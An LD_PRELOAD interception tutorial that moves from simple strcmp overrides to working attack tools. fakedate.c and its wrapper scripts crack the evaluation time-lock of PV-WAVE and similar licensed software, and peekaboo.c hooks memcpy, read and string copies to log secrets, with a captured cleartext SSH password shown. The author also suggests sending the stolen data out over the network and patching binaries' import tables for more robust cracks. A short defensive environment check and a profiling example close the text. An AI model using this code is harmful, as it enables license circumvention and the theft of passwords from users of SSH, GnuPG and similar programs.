Nigrum Libro Interceptis
by the xorcist
LD_PRELOAD is the name of an environment variable on GNU/Linux and Solaris systems which instructs the dynamic linker to preload and bind a user-specified library prior to binding symbols from the system libraries.
This allows the user to completely intercept many function calls made by a program.
The mechanism is very simple to use and it is hoped that novice C programmers will be able to use this tutorial and its sample code to create libraries of their own.
Below, the reader is shown the basic effect of function overloading and is shown a simple way to call the original function. From there, we use the techniques to crack the time-lock of the PV-WAVE software (www.roguewave.com), and steal passphrases from SSH.
We close with a brief discussion of other possible uses of LD_PRELOAD.
The Basics of Writing Overloadable Libraries
First, a C file is created which defines the functions that one wishes to intercept, optionally calling the original function by means of libdl.
It is compiled to .o, and linked to .so, and can then be used with LD_PRELOAD.
Let me contrive a simple example for you, and we'll walk through two different layers of intercepting and manipulating program flow through LD_PRELOAD.
main.c
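    #include <stdio.h>
    #include <string.h>

    int main()
    {
        if (!strcmp("red", "black"))
            printf("true\n");
        else
            printf("false\n");
        return 0;
    }

hack.c

    /* Same signature as the real strcmp(), but it always reports a match */
    int strcmp(const char *a, const char *b)
    {
        return 0;
    }

Now, we compile our code:

    $ gcc -o foo main.c
    $ ./foo
    false
    $ gcc -fPIC -c hack.c ; ld -shared -Bsymbolic -o hack.so hack.o
    $ export LD_PRELOAD=./hack.so
    $ ./foo
    true

(If ./foo still prints false with the library loaded, your compiler has probably evaluated the constant comparison at build time; compiling main.c with -fno-builtin should prevent that.)
Obviously, our dummy strcmp() worked like a charm, but it will always return 0.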
This is fine for this example, but in a real program, we'll need to be able to call the real strcmp()! To do this, we maintain a function pointer to the real strcmp(), like so:
hack2.c
    #define _GNU_SOURCE             /* needed for RTLD_NEXT */
    #include <stdio.h>
    #include <unistd.h>
    #include <dlfcn.h>

    /* Utility function to return the pointer to a function named by a string */
    static void *getfunc(const char *funcName)
    {
        void *tmp;

        if ((tmp = dlsym(RTLD_NEXT, funcName)) == NULL) {
            fprintf(stderr, "error with %s: %s\n", funcName, dlerror());
            _exit(1);
        }
        return tmp;
    }

    /* Typedef ourselves a function pointer compatible with strcmp() */
    typedef int (*strcmp_t)(const char *a, const char *b);

    /* A new strcmp() which returns 0 if its arguments are "red" and "black";
     * otherwise it returns the true string comparison */
    int strcmp(const char *a, const char *b)
    {
        static strcmp_t old_strcmp = NULL;

        /* Set up old_strcmp as a name for the real strcmp() function (once) */
        if (!old_strcmp)
            old_strcmp = (strcmp_t)getfunc("strcmp");

        if ((!old_strcmp("red", a)) && (!old_strcmp("black", b)))
            return 0;
        return old_strcmp(a, b);
    }

Using these basic techniques, and some creativity in the choice of which functions to overload, all sorts of useful things can be done.
Now that we've seen the basic mechanisms of using LD_PRELOAD, we'll start looking at practical uses.
Subverting Time-locked Demonstration Programs
The first application that we'll put together is a generic library for cracking time-locked demo programs.
The strategy that we will use is to create a shared library which constrains the time returned by gettimeofday() to a configurable interval (specified by environment variables).
This way, one instance of the library can be used to fool multiple time-locked demos using different valid date ranges.
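The interval constraint is just modular arithmetic on the epoch value. As a minimal sketch (the helper name map_into_interval() is made up for illustration and is not part of the library), folding a real clock reading into the half-open range [min, max) might look like this:

```c
#include <stdio.h>
#include <time.h>

/* Hypothetical helper: fold t into [min, max).
 * Returns t unchanged when the interval is empty, so we never divide by zero. */
time_t map_into_interval(time_t t, time_t min, time_t max)
{
    time_t span = max - min;
    time_t off;

    if (span <= 0)
        return t;

    off = (t - min) % span;
    if (off < 0)            /* C's % can yield a negative result when t < min */
        off += span;
    return min + off;
}
```

For example, with min = 1192702886 and max = 1193653286 (an 11-day span of 950400 seconds), a later reading of 1224713722 folds back to 1193350522. The real clock keeps advancing, but the value the program sees wraps around inside the window.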
As a field test, we'll apply our library against a working time-locked demo of PV-WAVE.
Just like many other commercial Linux/UNIX programs, this program uses FlexLM as its license manager. Success against PV-WAVE implies applicability against most other commercial demos as well.
We'll call our library fakedate.so and we define the following environment variables:
- FAKEDATE_MIN: The minimum epoch integer (number of seconds since 1970-01-01 00:00:00 UTC) to return via gettimeofday().
- FAKEDATE_MAX: The maximum epoch integer to return via gettimeofday().
- FAKEDATE_DEBUG: A flag which, when present, causes the printing of debugging or tracing info to stderr.
- FAKEDATE_NUMCALLS: The number of gettimeofday() calls for which we'll return a fake date. "0" means that we'll always return a bogus time. A small nonzero value is useful for fooling an expiry check that happens only at startup.
Overloaded functions: gettimeofday() and time().
fakedate.c
    #define _GNU_SOURCE             /* needed for RTLD_NEXT */
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <dlfcn.h>
    #include <time.h>
    #include <sys/time.h>

    /* Pointer to the real gettimeofday(), looked up with dlsym() as in hack2.c.
     * Recent glibc headers declare the second argument as void *; older ones
     * use struct timezone *, so adjust the type if your headers complain. */
    typedef int (*gettimeofday_t)(struct timeval *tv, void *tz);
    static gettimeofday_t real_gettimeofday = NULL;

    /* Declare global state that our hijacked functions use */
    int HAVE_OPTS = 0;      /* Have we already checked the environment? */
    int RUN = 0;            /* How many times has gettimeofday() run */
    int NUMCALLS = 0;       /* How many times to return a bogus time, 0 = always */
    int DEBUG = 0;          /* Do we print debugging info? */
    time_t START_TIME;      /* Remember the time we started */
    time_t MIN = 0;         /* Minimum time value to return */
    time_t MAX = 0;         /* Maximum time value to return */

    /* Inspect the environment and set up the global state */
    void loadopts()
    {
        struct timeval tv;

        real_gettimeofday = (gettimeofday_t)dlsym(RTLD_NEXT, "gettimeofday");
        if (!real_gettimeofday) {
            fprintf(stderr, "FakeDate: %s\n", dlerror());
            _exit(1);
        }

        if (getenv("FAKEDATE_DEBUG"))
            DEBUG = 1;
        MAX = getenv("FAKEDATE_MAX") ? atol(getenv("FAKEDATE_MAX")) : 1;
        NUMCALLS = getenv("FAKEDATE_NUMCALLS") ? atoi(getenv("FAKEDATE_NUMCALLS")) : 0;
        MIN = getenv("FAKEDATE_MIN") ? atol(getenv("FAKEDATE_MIN")) : 0;

        real_gettimeofday(&tv, NULL);
        START_TIME = tv.tv_sec;
        HAVE_OPTS = 1;
    }

    int gettimeofday(struct timeval *tv, void *tz)
    {
        int ret;

        if (!HAVE_OPTS)
            loadopts();

        /* Get the genuine current time */
        ret = real_gettimeofday(tv, tz);

        /* If we're munging the date, we map the time into our interval */
        if ((MAX > MIN) && ((NUMCALLS == 0) || (RUN++ < NUMCALLS))) {
            time_t off = (tv->tv_sec - MIN) % (MAX - MIN);
            if (off < 0)    /* the real time may be earlier than MIN */
                off += MAX - MIN;
            tv->tv_sec = MIN + off;
        }

        if (DEBUG) {
            fprintf(stderr, "FakeDate: GetTimeOfDay [%ld , %ld] ", (long)MIN, (long)MAX);
            fprintf(stderr, "(tv->tv_sec = %ld) ", (long)tv->tv_sec);
            fprintf(stderr, "(%d total calls)\n", NUMCALLS);
        }
        return ret;
    }

    time_t time(time_t *t)
    {
        struct timeval tv;
        time_t h;

        /* Route time() through our own gettimeofday() so both agree */
        gettimeofday(&tv, NULL);
        h = tv.tv_sec;
        if (DEBUG)
            fprintf(stderr, "FakeDate: Time() [%ld, %ld] (Returned %ld)\n",
                    (long)MIN, (long)MAX, (long)h);
        if (t)
            (*t) = h;
        return h;
    }

Now, to direct this library against the PV-WAVE time-lock.
If we just finished installing PV-WAVE, we have 12 days to evaluate it before it shuts off (we'll use 11 days to be safe).
So we proceed by getting the time interval we are interested in as seconds from the epoch:
    $ d=`date +'%s'` ; echo -e "\nMin: $d\nMax: $((d+24*60*60*11))"

    Min: 1192702886
    Max: 1193653286

If PV-WAVE was installed to /usr/local/vni and the fakedate.so library is also placed there, we can now put a wave.sh front-end script in /usr/local/bin such as:
wave.sh
    #!/bin/bash
    . /usr/local/vni/wave/bin/wvsetup.sh
    export LD_PRELOAD=/usr/local/vni/fakedate.so
    export FAKEDATE_MIN=1192702886
    export FAKEDATE_MAX=1193653286
    export FAKEDATE_NUMCALLS=1
    /usr/local/vni/wave/bin/wave "$@"

And that's it.
However, I'll give you a hint here. You don't need to specify the epoch range as the 11 day period.
In fact, it is somewhat better to actually constrain the interval to a few seconds. This is because when the program does its expiry check, if the apparent time is very early in the evaluation period, no warnings or messages about time-outs or registration are given.
As the time counts down, PV-WAVE starts reminding you that it will expire. By constraining the interval to just a few seconds, we ensure that PV-WAVE will never nag us.
We can now verify proper functionality.
First, you can break it by moving the epoch range in a copy of /usr/local/bin/wave.sh ahead to force the program to time out:
    $ cat broken
    #!/bin/bash
    . /usr/local/vni/wave/bin/wvsetup.sh
    export LD_PRELOAD=/usr/local/lib/fakedate.so
    export FAKEDATE_MIN=2192702886
    export FAKEDATE_MAX=2193653286
    export FAKEDATE_NUMCALLS=1
    /usr/local/vni/wave/bin/wave "$@"
    $ ./broken -64
    The evaluation period for CL has expired.
    Contact your system administrator

Now, you can move it back and voilà, it works again:
    $ cat working
    #!/bin/bash
    . /usr/local/vni/wave/bin/wvsetup.sh
    export LD_PRELOAD=/usr/local/lib/fakedate.so
    export FAKEDATE_MIN=1192702886
    export FAKEDATE_MAX=1193653286
    export FAKEDATE_NUMCALLS=1
    /usr/local/vni/wave/bin/wave "$@"
    $ ./working -64
    PV-WAVE Version 9.00 (linux linux64 x86_64).
    Copyright (C) 2007, Visual Numerics, Inc.
    All rights reserved. Unauthorized reproduction prohibited.
    PV-WAVE v9.00 UNIX/WINDOWS
    ...

Next, let's actually set the system time ahead, say, one year and try the working script.
When we get our WAVE> prompt, we enter the command: PRINT, TODAY()
And we'll see a coded date structure equal to the system time and outside the licensed epoch range.
The first call to gettimeofday() fooled the expiry check and now we're returning the real value because FAKEDATE_NUMCALLS is equal to 1.
    $ date; ./working -64
    Wed Oct 22 18:15:22 EDT 2008
    PV-WAVE Version 9.00 (linux linux64 x86_64).
    Copyright (C) 2007, Visual Numerics, Inc.
    All rights reserved. Unauthorized reproduction prohibited.
    PV-WAVE v9.00 UNIX/WINDOWS
    Your current interactive graphics device is: X
    If you are not running on a linux integrated display use the SET_PLOT command to set the appropriate graphics device (if you have not already done so).
    The following function keys are defined with PV-WAVE commands:
    F1 - Start the PV-WAVE Demonstration/Tutorial System
    F2 - Invoke the PV-WAVE Online Help Facility
    F3 - Output the PV-WAVE Session Status
    PV-WAVE Visual Exploration technology available.
    PV-WAVE IMSL Mathematics technology available.
    PV-WAVE IMSL Statistics technology available.
    Enter "NAVIGATOR" at the WAVE> prompt to start the PV-WAVE Navigator.
    WAVE> PRINT, TODAY()
    { 2008 10 22 18 16 2.00000 93541.761 0 }
    WAVE>

We now have a fully functional copy of PV-WAVE, and if we use the few-second trick, we don't even get the nagging registration reminders.
This library can also be leveraged against other commercial Linux applications, including pricey high-profile software like MATLAB, Research Systems Inc.'s IDL, and others. (And don't forget to set your system time back to the current date!)
Function Tracing to Steal Passwords
While the operating system won't allow Set User ID (SUID) programs to honor LD_PRELOAD (so no intercepting passwd or su), there are other important programs, like GnuPG, SSH, Telnet, or KWalletManager which we can subvert in order to steal passphrases, plaintext, and other secret bits.
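The SUID restriction comes from the dynamic linker's secure-execution mode. As a rough sketch, assuming Linux with glibc 2.16 or later, a process can ask whether it was started in that mode through getauxval(AT_SECURE); the helper names below are made up for illustration:

```c
#include <stdio.h>
#include <sys/auxv.h>   /* getauxval(), AT_SECURE (Linux, glibc 2.16+) */

/* Hypothetical helper: nonzero when the loader runs us in secure-execution
 * mode, which is the case for set-user-ID and set-group-ID programs. */
int in_secure_mode(void)
{
    return getauxval(AT_SECURE) != 0;
}

/* Hypothetical helper: print which preload policy applies to this process. */
void describe_preload_policy(FILE *out)
{
    if (in_secure_mode())
        fprintf(out, "secure-execution mode: LD_PRELOAD is restricted\n");
    else
        fprintf(out, "normal mode: LD_PRELOAD is honored\n");
}
```

An ordinary program started from a shell reports normal mode, which is why the everyday user-land tools listed above remain exposed.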
Which functions would be most useful to us?
We certainly can expect to get a peek up someone's skirt by overloading memcpy().
Likewise, strcpy() and strncpy() are good choices as well, and for the same reasons.
On the I/O side, we'll overload read().
We could easily think of many more functions to add here.
getpass() is conspicuously absent from our list only because it is deprecated. If you're targeting a legacy application, though, it is easy enough to add.
Our method will be simple passive eavesdropping on the four above-named functions.
We'll export the data that we intercept by appending it to a file in /tmp.
If actually deployed, we'd want to take some precautions here. Perhaps we might like to encrypt this file by burying a public-key into our lib and randomly generating a symmetric key. Or, we could transmit the contents out over the network in real-time. But for this example, I'll just leave it sitting in a file out in /tmp.
peekaboo.c
    #define _GNU_SOURCE             /* needed for RTLD_NEXT; must precede the includes */
    #include <stdio.h>
    #include <unistd.h>
    #include <dlfcn.h>

    #define FILENAME "/tmp/icu.txt"

    /* Typedef our function pointers */
    typedef void *(*memcpy_t)(void *dest, const void *src, size_t n);
    typedef ssize_t (*read_t)(int FD, void *buf, size_t n);
    typedef char *(*strcpy_t)(char *dest, const char *src);
    typedef char *(*strncpy_t)(char *dest, const char *src, size_t n);

    /* Our global file pointer */
    FILE *peekaboofile = NULL;

    static void *getfunc(const char *funcName)
    {
        void *tmp;

        if ((tmp = dlsym(RTLD_NEXT, funcName)) == NULL) {
            fprintf(stderr, "error with %s: %s\n", funcName, dlerror());
            _exit(1);
        }
        return tmp;
    }

    void ensure_file()
    {
        if (!peekaboofile)
            peekaboofile = fopen(FILENAME, "a");
    }

    char *strncpy(char *dest, const char *src, size_t n)
    {
        static strncpy_t real_strncpy = NULL;

        ensure_file();
        fprintf(peekaboofile,
                "STRNCPY: \nSRC: %s\nDST: %s\nSIZE: %zu\n------------------------\n",
                src, dest, n);
        real_strncpy = (strncpy_t)getfunc("strncpy");
        return real_strncpy(dest, src, n);
    }

    char *strcpy(char *dest, const char *src)
    {
        static strcpy_t real_strcpy = NULL;

        ensure_file();
        fprintf(peekaboofile,
                "STRCPY: \nSRC: %s\nDST: %s\n------------------------\n",
                src, dest);
        real_strcpy = (strcpy_t)getfunc("strcpy");
        return real_strcpy(dest, src);
    }

    void *memcpy(void *dest, const void *src, size_t n)
    {
        static memcpy_t real_memcpy = NULL;

        ensure_file();
        fprintf(peekaboofile, "MEMCPY:\nSRC: ");
        fwrite(src, n, 1, peekaboofile);
        fprintf(peekaboofile, "\nDST: ");
        fwrite(dest, n, 1, peekaboofile);
        fprintf(peekaboofile, "\nSIZE: %zu\n----------------------\n", n);
        real_memcpy = (memcpy_t)getfunc("memcpy");
        return real_memcpy(dest, src, n);
    }

    ssize_t read(int FD, void *buf, size_t n)
    {
        static read_t real_read = NULL;
        ssize_t i;

        ensure_file();
        real_read = (read_t)getfunc("read");
        i = real_read(FD, buf, n);
        /* The buffer is not NUL-terminated, so log only the bytes actually read */
        fprintf(peekaboofile, "READ:\nFD: %d\nBUF: ", FD);
        if (i > 0)
            fwrite(buf, (size_t)i, 1, peekaboofile);
        fprintf(peekaboofile, "\nSIZE: %zu\n-------------------\n", n);
        return i;
    }

For our field test with this library, we'll examine SSH.
Let's get right to it and test this out.
Set up LD_PRELOAD, and SSH to a host of your choice, and log in.
Now, let's take a look at /tmp/icu.txt with something like less.
SSH starts off making a bunch of strncpy() calls such as:

    $ less /tmp/icu.txt
    ...
    STRNCPY:
    SRC: Argument list too long
    DST:
    SIZE: 32
    -------------------
    STRNCPY:
    SRC: Exec format error
    DST:
    SIZE: 32
    -------------------
    ...

where it is apparently setting up an internal array of messages. Then we hit a block of several read() and memcpy() calls where the connection is established and options negotiated.
First, let's find out what the remote host and username are...
Search the file for the string SRC: ssh-connection and you'll find that, a few memcpy() calls up, is the username on the remote host.
Search for the string SRC: host@ and you'll find the remote hostname.
That was easy.
Now to find the password: Just search the file for the string password and you'll notice that near one of them (the third, in my capture) is the cleartext password intercepted by memcpy().
    MEMCPY:
    SRC: password
    DST: none<F1><FE>rw
    SIZE: 8
    -------------------
    MEMCPY:
    SRC: ^Q
    DST: <C2>
    SIZE: 1
    -------------------
    MEMCPY:
    SRC: ^@^@^@^H
    DST: <BE> ^K<E0>
    SIZE: 4
    -------------------
    MEMCPY:
    SRC: this-is-my-secret-password
    DST: <87>G<E2>^D@<E8>
    SIZE: 8
    -------------------

In experiments with this and other similar code, every user-land program that handles passwords was vulnerable to this sort of eavesdropping, including GnuPG, Telnet, rdesktop, etc.
This is abysmal, given how easy it is to frustrate this method. Simple statically-linked clones of getenv() and strcmp() are all that a program needs to inspect its environment at startup and ensure privacy.
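A startup check of that kind might be sketched as follows. The names has_prefix() and find_preload() are made up for illustration; the point is that the scan walks the environment array itself and uses a private comparison routine, so it does not depend on a getenv() or strcmp() that a preloaded library could have replaced:

```c
#include <stddef.h>

/* Hypothetical private prefix test, so no library string function is called */
static int has_prefix(const char *s, const char *prefix)
{
    while (*prefix) {
        if (*s++ != *prefix++)
            return 0;
    }
    return 1;
}

/* Hypothetical helper: return the value of a non-empty LD_PRELOAD entry
 * found in envp, or NULL if there is none. */
const char *find_preload(char *const *envp)
{
    static const char key[] = "LD_PRELOAD=";
    size_t i;

    if (envp == NULL)
        return NULL;
    for (i = 0; envp[i] != NULL; i++) {
        if (has_prefix(envp[i], key) && envp[i][sizeof key - 1] != '\0')
            return envp[i] + (sizeof key - 1);
    }
    return NULL;
}
```

A program could call find_preload() on the envp array handed to main() and refuse to prompt for a passphrase when the result is non-NULL. This is only a first line of defense: it does not see libraries listed in /etc/ld.so.preload, and a preloaded library gets to run its own initialization code before main() does.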
Import Table Patching
Since every piece of software is different, as you might expect, the results of using LD_PRELOAD to overload, say, gettimeofday() will differ.
Suppose, for example, you have a software package where only one binary includes time-lock licensing checks and other binaries use gettimeofday() for other uses.
You might like the other binaries to use the proper gettimeofday(), and only have the time-locked binary get tricked.
One way to do this is by patching the function import table.
Simply open your binary in a hex editor and search for gettimeofday. You'll find that string in an area with other function names nearby. Now, you can patch that string and rename it to getximeofday.
Now change your LD_PRELOAD library to provide a getximeofday() function.
The time-locked binary will be fooled, and other binaries will run the proper function and get the correct time.
Using such methods, it is easy to get a very robust crack for many types of evaluation licensed software with minimal effort.
After the library is built, most software examples of that sort can be defeated in 20 to 30 seconds, or less.
Closing Comments
There are many other uses for LD_PRELOAD, naturally.
You might intercept writes to the sound card and dump PCM data to rip audio from software which otherwise does not support the ability to save (Adobe Flash, for instance).
Another important use is for function profiling and reverse engineering.
By overloading selected functions, you can obtain traces of function execution, or counts of the number of times a function was called, etc.
This can be very useful for general debugging purposes.
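As a small sketch of the profiling idea, the library below counts calls to puts() and prints the total when the program exits. The choice of puts(), the counter name, and the report format are arbitrary; the destructor attribute is a GCC/Clang extension, and the counter is not thread-safe:

```c
#define _GNU_SOURCE     /* needed for RTLD_NEXT */
#include <dlfcn.h>
#include <stdio.h>

typedef int (*puts_t)(const char *s);

unsigned long puts_calls = 0;   /* illustrative counter, not thread-safe */

/* Our puts(): count the call, then hand off to the real function */
int puts(const char *s)
{
    static puts_t real_puts = NULL;

    if (!real_puts)
        real_puts = (puts_t)dlsym(RTLD_NEXT, "puts");
    if (!real_puts)
        return EOF;

    puts_calls++;
    return real_puts(s);
}

/* Runs when the library is unloaded at program exit */
__attribute__((destructor))
static void report_counts(void)
{
    fprintf(stderr, "puts() was called %lu times\n", puts_calls);
}
```

Built as a shared object (for instance with gcc -fPIC -shared -o count.so count.c -ldl) and named in LD_PRELOAD, this reports the call count for any dynamically linked program without touching its source.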